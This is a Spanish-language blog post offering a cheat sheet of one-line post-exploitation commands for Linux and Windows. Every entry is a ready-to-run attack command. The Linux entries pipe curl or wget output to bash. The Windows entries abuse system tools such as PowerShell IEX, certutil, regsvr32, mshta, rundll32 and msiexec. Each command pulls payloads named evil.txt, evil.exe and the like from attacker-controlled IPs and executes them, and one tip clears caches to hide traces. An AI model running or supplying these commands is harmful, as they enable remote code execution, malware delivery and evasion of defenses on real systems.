En el proceso de una intrusión, normalmente en la fase de post-explotación, un atacante necesita descargar y ejecutar código malicioso a través de comandos para implementar operaciones tales como recopilación de información, persistencia, escalada de privilegios, bypasses de defensas, extracción de credenciales, movimiento lateral y exfiltración de datos. Hoy traemos una buena recopilación de comandos en una sóla línea para ello:
LINUX
01. curl
Ejecutar el shell script de la página http con curl, sin descargar, directamente en la máquina local.
Opción 1:curl -fsSL http://192.168.99.19:8080/test.sh | bash
Opción 2:bash < <( curl http://192.168.99.19:8080/test.sh )02. wget
Ejecutar el comando wget para descargar programas maliciosos de forma remota.
Opción 1:wget -q -O- http://192.168.99.19:8080/test.sh | bash
Opción 2:wget http://192.168.99.19:8080/shell.txt -O /tmp/x.php && php /tmp/x.phpbash -c '(curl -fsSL http://192.168.99.19:8080/test.sh||
wget -q -O- http://192.168.99.19:8080/test.sh)|bash -sh >/dev/null 2>&1&'03. rcp
El comando rcp se usa para copiar archivos o directorios remotos.
rcp root@x.x.x.x:./testfile testfile04. scp
scp es una versión mejorada de rcp, scp está cifrado.
scp username@servername:/path/filename /tmp/local_destination05. rsync
Utilizar rsync para sincronizar de forma remota y extraer archivos a un servidor local.
rsync -av x.x.x.x:/tmp/passwd.txt /tmp/passwd.txt06. sftp
Utilizar sftp para descargar archivos en el servidor remoto.
sftp admin@192.168.99.242 <<EOF
get /tmp/2.txt
quit
EOF
WINDOWS
01. Powershell
Utilizar powershell para ejecutar scripts ps1 de forma remota.
powershell -nop -w hidden -c "IEX ((new-object net.webclient).downloadstring('http://192.168.28.128/evil.txt'))"02. Bitsadmin
Utilizar el comando bitsadmin para descargar el archivo a la máquina de destino.
bitsadmin /transfer n http://192.168.28.128/imag/evil.txt d:\test\1.txt03. certutil
Se utiliza para hacer una copia de seguridad del servicio de certificados, por lo general, se recomienda eliminar la caché después de descargar el archivo.
#descargar archivos
certutil -urlcache -split -f http://192.168.28.128/imag/evil.txt test.php
#borrar la caché
certutil -urlcache -split -f http://192.168.28.128/imag/evil.txt delete04. rundll32
Con rundll32.exe, JavaScript se puede ejecutar a través de mshtml.dll, que depende del componente WScript.shell
rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";document.write();h=new%20ActiveXObject("WinHttp.WinHttpRequest.5.1");h.Open("GET","http://192.168.28.131:8888/connect",false);try{h.Send();b=h.ResponseText;eval(b);}catch(e){new%20ActiveXObject("WScript.Shell").Run("cmd /c taskkill /f /im rundll32.exe",0,true);}05. regsvr32
Ejecución de payload remoto, analizar archivo .src.
regsvr32.exe /u /n /s /i:http://192.168.28.131:8888/file.sct scrobj.dll06. wmic
Ejecutar el siguiente comando WMIC para descargar y ejecutar el archivo XSL malicioso desde el servidor remoto:
wmic os get /FORMAT:"http://192.168.28.128/evil.xsl"07. msiexec
Se utiliza para instalar el paquete de instalación de Windows Installer y puede ejecutar el archivo msi de forma remota.
msiexec /q /i http://192.168.28.128/evil.msi08. IEExec
La aplicación IEexec.exe es un programa que viene con .NET Framework. Ejecutar IEExec.exe y usar la URL para iniciar otros programas.
crosoft.NET\Framework64\v2.0.50727>caspol.exe -s off
C:\Windows\Microsoft.NET\Framework64\v2.0.50727>IEExec.exe http://192.168.28.131/evil.exe09. mshta
mshta se usa para ejecutar archivos .hta
mshta http://192.168.28.128/run.hta10. msxsl
msxsl.exe es un programa utilizado por Microsoft para procesar XSL bajo la línea de comandos
msxsl http://192.168.28.128/scripts/demo.xml http://192.168.28.128/scripts/exec.xsl11. pubprn.vbs
Existe un script WSH firmado por Microsoft llamado pubprn.vbs en Windows 7 y superior, que se puede utilizar para analizar el script .sct:
"C:\Windows\System32\Printing_Admin_Scripts\zh-CN\pubprn.vbs" 127.0.0.1 script:https://gist.githubusercontent.com/enigma0x3/64adf8ba99d4485c478b67e03ae6b04a/raw/a006a47e4075785016a62f7e5170ef36f5247cdb/test.sctFuente: https://mp.weixin.qq.com/s/pz6y8299gMUOgtZjZv5puw
Ver también: https://www.hackplayers.com/2017/12/comandos-en-una-sola-linea-para-windows.html
Comentarios
Publicar un comentario